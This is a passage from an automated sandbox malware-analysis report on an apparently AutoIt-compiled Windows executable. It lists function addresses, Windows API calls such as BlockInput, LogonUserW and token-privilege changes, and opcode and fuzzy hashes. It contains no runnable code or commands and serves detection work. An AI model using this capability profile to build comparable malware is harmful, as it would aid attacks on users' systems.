                                          • CloseHandle.KERNEL32(?,?,00E48851), ref: 00E4873A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 671efa21841d08a0cdb14d5334f1966f6aa8c87fc669b0d03245c2c28aa5cc3c
                                          • Instruction ID: 1898c51d957677486e4e3a8b34999a25829e3c967abefa028df084aba466166f
                                          • Opcode Fuzzy Hash: 671efa21841d08a0cdb14d5334f1966f6aa8c87fc669b0d03245c2c28aa5cc3c
                                          • Instruction Fuzzy Hash: 41E0B676410610EEE7252B61ED09DB77BE9EF04395B24886DF5AA90470DB62ACD0EB10
                                          Function 00E1A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E18F97,?,?,?,00000001), ref: 00E1A39A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E1A3A3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 59bac160f1e371da3d12649f5e2dd1790632cb0d2c4985d2764a807d853709bc
                                          • Instruction ID: 82aeead4cf962f1f5849cd3113887df740d16a004a86da575cd4550353c129a3
                                          • Opcode Fuzzy Hash: 59bac160f1e371da3d12649f5e2dd1790632cb0d2c4985d2764a807d853709bc
                                          • Instruction Fuzzy Hash: 61B09231054208BFCA00AB92EC09B883F68EB44AAAF404020F60D94060CB6254948A91
                                          Function 00E1F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 372dc3fbfd05acb3c85696eec029c5e2440c3e692cb56f93a5e875ca05713249
                                          • Instruction ID: 1abbbbda893c87f28cd20164d13a355ccc39684c6cb28f50d8f2d8de4700c3e9
                                          • Opcode Fuzzy Hash: 372dc3fbfd05acb3c85696eec029c5e2440c3e692cb56f93a5e875ca05713249
                                          • Instruction Fuzzy Hash: 88321631D69F014DD7239635D832375A24AAFB73D4F25E737E82AB59A6EB28C4C34240
                                          Function 00E2267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 93cd45f9a63d6c37009b8910ea2602ec42b5ca2095e8dbed359b2e1a6dbbea1f
                                          • Instruction ID: f0812fd199e3fcd80c6e1f223fb3d77fa75eee5eead7a6b86f8dcef41c6dc198
                                          • Opcode Fuzzy Hash: 93cd45f9a63d6c37009b8910ea2602ec42b5ca2095e8dbed359b2e1a6dbbea1f
                                          • Instruction Fuzzy Hash: E5B1F130D2AF514DE723963A8831336B65CAFBB2C5F55D72BFC2A74D22EB2185874241
                                          Function 00E641FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • BlockInput.USER32(00000001), ref: 00E64218
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          • Opcode ID: f294f183852902ee8ab388be98aeee64b01ec39103a87add66f7f2cd97673753
                                          • Instruction ID: fdd07f48544c6827b3bf9500863608e04aa321db30aeaa21059adf081f222c6a
                                          • Opcode Fuzzy Hash: f294f183852902ee8ab388be98aeee64b01ec39103a87add66f7f2cd97673753
                                          • Instruction Fuzzy Hash: A4E048712801145FC710DF59E454A9AF7E8EF547A0F11C015FE49D7361DA70E8408BF0
                                          Function 00E54EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E54F18
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          • Opcode ID: d05ee225935c1fc5f831614e7f6e1be3f2fe242e29f7abad43721e179f3742b4
                                          • Instruction ID: 7644f6bebf929f19993f978ad9efd56265367518b9a8bf09436fcaa6475bddaa
                                          • Opcode Fuzzy Hash: d05ee225935c1fc5f831614e7f6e1be3f2fe242e29f7abad43721e179f3742b4
                                          • Instruction Fuzzy Hash: 42D067E426460579E8198B28AC1BBB61109A34079FF947D89BA0AB94C198A568D8A035
                                          Function 00E48C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E488D1), ref: 00E48CB3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          • Opcode ID: 211a6dfff3a2843ded0ee23b2cfe423bdc453a0eb63b2a5b8cf730a672356f5f
                                          • Instruction ID: 4ccc3d2c25a583f029537164ceda7dba79420763dfa3ced8ab34ab7d373a9730
                                          • Opcode Fuzzy Hash: 211a6dfff3a2843ded0ee23b2cfe423bdc453a0eb63b2a5b8cf730a672356f5f
                                          • Instruction Fuzzy Hash: 26D05E3226450EAFEF018EA4DC01EAE3B69EB04B01F408111FE15D61A1C775D835AB60
                                          Function 00E32230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 00E32242
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: 03abace20e0711de3fc4265c349d25d15f744f00e356fbb840730892977b3490
                                          • Instruction ID: fa05e9b7b82977341442eb7a4fc6417ea96bc8335b1b9a0df0351a68919f9ba7
                                          • Opcode Fuzzy Hash: 03abace20e0711de3fc4265c349d25d15f744f00e356fbb840730892977b3490
                                          • Instruction Fuzzy Hash: 49C04CF1C00109DBDB05DB90D98CDEEB7BCAB04314F104095E105F2100D7749B44CA71
                                          Function 00E1A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E1A36A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 8ad340350021ef55d85e36ee78e5749d9ca5935b17270224835f657282330522
                                          • Instruction ID: 9f2d83c7022a8c597f7d661a98f332cf040440408f8bbf0bd5a70c31ab797423
                                          • Opcode Fuzzy Hash: 8ad340350021ef55d85e36ee78e5749d9ca5935b17270224835f657282330522
                                          • Instruction Fuzzy Hash: C5A0113000020CBB8A00AB82EC08888BFACEB002A8B008020F80C800228B32A8A08A80
                                          Function 00E08A0E Relevance: .6, Instructions: 608COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f426eab1696202fd9053e8292a7a5873f7739d1e1f5b2f18e9bbf08a50a04330
                                          • Instruction ID: c33b1c46e222525846463fab47846d75bab07d896a65e5f2d00dfb38b43c640d
                                          • Opcode Fuzzy Hash: f426eab1696202fd9053e8292a7a5873f7739d1e1f5b2f18e9bbf08a50a04330
                                          • Instruction Fuzzy Hash: E3220631A01615CBEF288B14D5D46BDB7B1EB46308F28647AD8C2BB6D2DB349DC1CB61
                                          Function 00E12405 Relevance: .3, Instructions: 345COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction ID: 19407bcf846f6db352e549893d89de56c6b7dfecd5b44bcb36d82249947063d0
                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction Fuzzy Hash: C3C106322050930ADF2D4639C8305BEFAE15EA27B535A279DE5B3EB0C4EF20D5B5D620
                                          Function 00E1283A Relevance: .3, Instructions: 341COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction ID: a23daf208af1ac002f6c4474e5b0d97f0ae991342853e5f445737507ce0c82fb
                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction Fuzzy Hash: 70C1D73220509309DF2D463988345BEFBE15EA27B535A279DE5B2EB4C4EF20D5B4D620
                                          Function 00E737F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,00E7F910), ref: 00E738AF
                                          • IsWindowVisible.USER32(?), ref: 00E738D3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharUpperVisibleWindow
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 4105515805-45149045
                                          • Opcode ID: f02bdc7ec8f91cfda10e837e2118815cd5dabc9c443eee2f959ab8f30911b5e8
                                          • Instruction ID: f6c0c8b40f9867460688e5b929a343457e9c8686e058a5fd3797055e56263ba4
                                          • Opcode Fuzzy Hash: f02bdc7ec8f91cfda10e837e2118815cd5dabc9c443eee2f959ab8f30911b5e8
                                          • Instruction Fuzzy Hash: 7FD18530204305DBCB54EF20D451AAAB7E1EF95344F12A458F88A7B3A3DB71EE4ADB51
                                          Function 00E7A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 00E7A89F
                                          • GetSysColorBrush.USER32(0000000F), ref: 00E7A8D0
                                          • GetSysColor.USER32(0000000F), ref: 00E7A8DC
                                          • SetBkColor.GDI32(?,000000FF), ref: 00E7A8F6
                                          • SelectObject.GDI32(?,?), ref: 00E7A905
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E7A930
                                          • GetSysColor.USER32(00000010), ref: 00E7A938
                                          • CreateSolidBrush.GDI32(00000000), ref: 00E7A93F
                                          • FrameRect.USER32(?,?,00000000), ref: 00E7A94E
                                          • DeleteObject.GDI32(00000000), ref: 00E7A955
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00E7A9A0
                                          • FillRect.USER32(?,?,?), ref: 00E7A9D2
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E7A9FD
                                            • Part of subcall function 00E7AB60: GetSysColor.USER32(00000012), ref: 00E7AB99
                                            • Part of subcall function 00E7AB60: SetTextColor.GDI32(?,?), ref: 00E7AB9D
                                            • Part of subcall function 00E7AB60: GetSysColorBrush.USER32(0000000F), ref: 00E7ABB3
                                            • Part of subcall function 00E7AB60: GetSysColor.USER32(0000000F), ref: 00E7ABBE
                                            • Part of subcall function 00E7AB60: GetSysColor.USER32(00000011), ref: 00E7ABDB
                                            • Part of subcall function 00E7AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E7ABE9
                                            • Part of subcall function 00E7AB60: SelectObject.GDI32(?,00000000), ref: 00E7ABFA
                                            • Part of subcall function 00E7AB60: SetBkColor.GDI32(?,00000000), ref: 00E7AC03
                                            • Part of subcall function 00E7AB60: SelectObject.GDI32(?,?), ref: 00E7AC10
                                            • Part of subcall function 00E7AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00E7AC2F
                                            • Part of subcall function 00E7AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E7AC46
                                            • Part of subcall function 00E7AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00E7AC5B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                          • String ID:
                                          • API String ID: 4124339563-0
                                          • Opcode ID: 7ef0d434e8c9b030eb0df07348c235a75082d477f88d245b9230f6bdf623f954
                                          • Instruction ID: fc20ac6ea695ccefeb5194730c07e2b9d952d62e172221c4eeabdc3d3183770b
                                          • Opcode Fuzzy Hash: 7ef0d434e8c9b030eb0df07348c235a75082d477f88d245b9230f6bdf623f954
                                          • Instruction Fuzzy Hash: AFA19072008301AFD710DF65DC08E6F7BA9FF88325F145A29F96AA61E1D730D889CB52
                                          Function 00DF2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 00DF2CA2
                                          • DeleteObject.GDI32(00000000), ref: 00DF2CE8
                                          • DeleteObject.GDI32(00000000), ref: 00DF2CF3
                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00DF2CFE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00DF2D09
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E2C68B
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E2C6C4
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E2CAED
                                            • Part of subcall function 00DF1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DF2036,?,00000000,?,?,?,?,00DF16CB,00000000,?), ref: 00DF1B9A
                                          • SendMessageW.USER32(?,00001053), ref: 00E2CB2A
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E2CB41
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E2CB57
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E2CB62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          • Opcode ID: 6e6a09918bdf0dca156dd8ad6674f36fef66afc6117c2a9618468c89b423ba8d
                                          • Instruction ID: 29cff18eb118a9d1a05473c169f978fcec16e4f86669cec5aa7736266ea0b441
                                          • Opcode Fuzzy Hash: 6e6a09918bdf0dca156dd8ad6674f36fef66afc6117c2a9618468c89b423ba8d
                                          • Instruction Fuzzy Hash: 47129C30600215AFDB24CF24D884BBDB7E5BF44304F659569E99AEB262C731EC81CFA1
                                          Function 00E677BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 00E677F1
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E678B0
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E678EE
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E67900
                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E67946
                                          • GetClientRect.USER32(00000000,?), ref: 00E67952
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E67996
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E679A5
                                          • GetStockObject.GDI32(00000011), ref: 00E679B5
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E679B9
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E679C9
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E679D2
                                          • DeleteDC.GDI32(00000000), ref: 00E679DB
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E67A07
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E67A1E
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E67A59
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E67A6D
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E67A7E
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E67AAE
                                          • GetStockObject.GDI32(00000011), ref: 00E67AB9
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E67AC4
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E67ACE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
